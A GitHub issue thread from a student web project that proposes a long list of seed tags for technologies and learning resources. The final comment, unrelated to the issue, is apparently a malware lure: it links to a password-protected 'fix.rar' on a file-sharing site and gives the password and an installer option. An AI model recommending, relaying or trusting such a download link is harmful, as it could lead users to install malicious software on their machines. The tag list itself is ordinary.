### ISSUE TITLE
BE: Chore: Seed Tags

### ISSUE THREAD

**Issue by epintozzi** [turingschool/turlink-be#14]
Starter seed list:

javascript
react
ruby
rails
video
blog
tutorial
python
java
C#
conference talk
Angular
Vue.js
Django
Flask
Spring
Laravel
Express.js
next.js
.NET
Bootstrap
jQuery
TensorFlow
PyTorch
Node.js
testing
rspec
minitest
cypress
mocha
chai
Documentation
Tutorials
Courses
Code Samples
Books
Podcasts
Webinars
Cheat Sheets
Articles
Whitepapers
Tools
Reference Guides
Workshops
Object-Oriented Programming (OOP)
Functional Programming
Procedural Programming
Test-Driven Development (TDD)
Agile
DevOps
Microservices
RESTful APIs
Background Jobs
GraphQL
Serverless
SQL
NoSQL
PostgreSQL
MySQL
MongoDB
Redis
Firebase
SQLite
Oracle
Git
GitHub
GitLab
Bitbucket
SVN
AWS
Google Cloud
Azure
Heroku
DigitalOcean
Kubernetes
Docker
Render
Vercel
Fly.io
HTML
CSS
JavaScript
SASS/SCSS
Webpack
Gulp
Babel
Responsive Design
GraphQL
Authentication
Authorization
Middleware
WebSockets
Encryption
SSL/TLS
OAuth
JWT
Secure Coding Practices
Penetration Testing
Vulnerability Scanning
Unit Testing
Integration Testing
End-to-End Testing
Test Automation
Load Testing
Selenium
Jest
Mocha
RSpec
Cypress
Agile
Scrum
Kanban
Jira
Trello
Asana
Time Tracking
Continuous Deployment
Continuous Integration
Jenkins
CircleCI
Travis CI
Docker
Kubernetes
Ansible
Terraform
Design Patterns
SOLID Principles
Architecture
Domain-Driven Design (DDD)
Model-View-Controller (MVC)
Event-Driven Architecture
Monolithic Architecture
Clean Architecture
Neural Networks
Deep Learning
Natural Language Processing (NLP)
Computer Vision
AI Ethics
Model Training
Data Preprocessing
Model Evaluation
iOS Development
Android Development
Flutter
React Native
SwiftUI
Xamarin
Kotlin Multiplatform
IDEs
Text Editors
Command-Line Tools
Debugging Tools
Package Managers
npm
pip
bundler
Profiling Tools
Code Linters
REST
SOAP
GraphQL
JSON
XML
OpenAPI
gRPC
WebSocket
User Experience (UX)
User Interface (UI)
Wireframing
Prototyping
Figma
Sketch
Adobe XD
User Research
Open Source
Licensing
Ethics in Software Development
Software Maintenance
Code Review
Documentation Writing

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
